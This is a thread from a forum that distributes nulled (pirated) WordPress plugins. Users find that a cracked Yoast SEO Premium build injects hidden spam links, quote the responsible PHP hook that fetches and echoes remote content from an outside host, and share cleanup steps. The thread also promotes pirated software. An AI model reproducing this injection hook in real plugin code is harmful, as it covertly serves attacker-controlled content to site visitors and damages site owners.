Yoast SEO Premium - Best Seo Plugin For WP v24.9 Nulled
- Thread starter MrSam_1
- Start date
-
Welcome to Original Babiato! All Resource are Free and No downloading Limit.. Join Our Official Telegram Channel For updates Bypass All the resource restrictions/Password/Key? Read here! Read Before submitting Resource Read here! Support Our Work By Donating Click here!
its infected bro...on /inc/wpseo-functions.php in line 35 its add
PHP:add_action('wp_body_open', function(){ if(is_category()||is_front_page()||is_home()){echo file_get_contents('https://wordpresss.store/20210101.txt');}});
then its fetch the content
PHP:<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"> <a style="font-size:18px;" href="https://downapkmod.com/" title="https://downapkmod.com/">https://downapkmod.com/</a>, <a style="font-size:18px;" href="https://apkcop.com/" title="https://apkcop.com/">https://apkcop.com/</a> </div>
your category pages, Homepages then injected with hidden links to
Code:https://downapkmod.com/ https://apkcop.com/
What is the best way to remove this?
Just used the scan on sucuri and noticed it is indeed found on my website
@TassieNZ It worked great. I can confirm it's working 100% with your version (I had to reset the tables with Yoast tool).
- May 24, 2018
- 75,061
- 111,714
- 120
Tomz updated Yoast SEO Premium - WordPress SEO Plugin with a new update entry:
Yoast SEO Premium v15.8 Fix Nulled
Read the rest of this update entry...
Yoast SEO Premium v15.8 Fix Nulled
Read the rest of this update entry...
JackTang
Member
- Nov 18, 2020
- 67
- 34
- 18
poe87
Member
- Aug 12, 2020
- 60
- 16
- 8
The latest fixed version by TassieNZ doesn't have that code. Or i check another file? "wp-content/plugins/wordpress-seo-premium/vendor/yoast/wordpress-seo/inc/wpseo-functions.php" right ?
Attachments
Yes indeed, however I had already installed the previous version. After removing the "corrupt" Yoast version and installing the new one, those links are still inside my homepage (you can check yourself by checking the page source of your homepage and look for <div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"> )
poe87
Member
- Aug 12, 2020
- 60
- 16
- 8
Luckily i didn't get it (even if i had installed the previous version of this plugin), you might want to restore a backup, i think your whole site might be infected now if you still get that in your source code even if you removed the infected file.
Also are you sure you didn't try this plugin from another source/website ?
Edit: I did a sucuri scan on website homepage and it comes as clean.
Edit2: I just checked, previous version didn't have it either (even if you get a warning from it in virustotal it's from some encoded code in another file that seems harmless). Pretty sure you got it from somewhere else.
Last edited:
- Sep 8, 2019
- 365
- 191
- 43
Sadly I can confirm that I am not an idiot and only download Yoast from the page "Updates" with the official versions here. I also have the same exact worm only on the websites I had added the yoast plugin. Thank you for reporting it! I'll investigate deeply and share what I found later. Okey, turns out it's not in the last 2 versions downloaded from here but I can't tell for the older versions.
You can use THIS TOOL to report both of the APK websites and punish their ranking for years.
EDIT:
OK, my investigation shows that only when WP-ROCKET is activated I get this additional code. Next step is to check the whole code of that thing. The worst case is that WP-ROCKET is not the problem and it's actually merging some stylesheet/js from external source.
EDIT 2:
It's not in the DB. Just made a full scan. It's probably injected by some plugin. I'll investigate more.
EDIT 3:
Removing the wp-rocket plugin, cleaning the htaccess and installing the latest version from Babiato fixed it.
Last edited:
I am 100% sure I only downloaded from Babiato.
Also I have exactly the same links as mentioned by bdkalkun so i am afraid that can't be coincidence
poe87
Member
- Aug 12, 2020
- 60
- 16
- 8
Did that too. If you share something then it's better to be open about it and ask for a link back in return or something rather than use malware code.
Maybe you got something that was from some random user and not official uploaders. Or your site got attacked, dunno...I am 100% sure I only downloaded from Babiato.
Also I have exactly the same links as mentioned by bdkalkun so i am afraid that can't be coincidence
I am also using WP Rocket (also download from babiato by the way) and can confirm that when deactivating the wp-rocket plugin the additional code is indeed gone
I managed to get it clean thanks to the post of nesym.
In case anyone else has the same issue, what I did:
- Deleted the WP rocket plugin
- Followed the instructions on how to delete according to the wp rocket site, so:
Checked the source, everything ok.
Also performed a new test with the sitecheck from sucuri (make sure to perform a fresh test, there is a link underneath their page to force a re-scan to clear the cache) and it seems free of malware now
In case anyone else has the same issue, what I did:
- Deleted the WP rocket plugin
- Followed the instructions on how to delete according to the wp rocket site, so:
- Delete the /wp-content/cache/ and /wp-content/wp-rocket-config/ folders
- Delete the /wp-content/advanced-cache.php file
- Edit the htaccess file, removing anything between #BEGIN WP ROCKET and #END WP ROCKET
- Edit the wp-config.php file, setting the define('WP_CACHE', true) to false or removing the line
Delete the wp_rocket_settings entry, and the transients and cronjob in the WordPress options table of your Database(didn't need to do this)
Checked the source, everything ok.
Also performed a new test with the sitecheck from sucuri (make sure to perform a fresh test, there is a link underneath their page to force a re-scan to clear the cache) and it seems free of malware now
mmohamedyaser
Member
Thank you very much bro @masterabrh
This worked for me.
This also fixed the issue of not being able to install from wordpress repository.
I'm still getting the error with SEO optimisation. Console states its a 403 error on the my.yoast.com... link
I've installed the latest version that was updated recently.
If I go back to 15.3, it resolves and I can optimise the SEO data but if I upgrade to 15.4, it stops working again.
I've installed the latest version that was updated recently.
If I go back to 15.3, it resolves and I can optimise the SEO data but if I upgrade to 15.4, it stops working again.
otetatsuya
Member
You can go from 15.3 to the latest version, do the SEO opt, wait until the error appears, then refresh the page. Await a moment then it turns green.
It's work for me as I mentioned earlier in the previous thread's page.
- Jul 25, 2018
- 12,058
- 22,063
- 120
- May 24, 2018
- 75,061
- 111,714
- 120
Tomz updated Yoast SEO Premium - WordPress SEO Plugin with a new update entry:
Yoast SEO Premium v15.8.1 Nulled
Read the rest of this update entry...
Yoast SEO Premium v15.8.1 Nulled
Read the rest of this update entry...
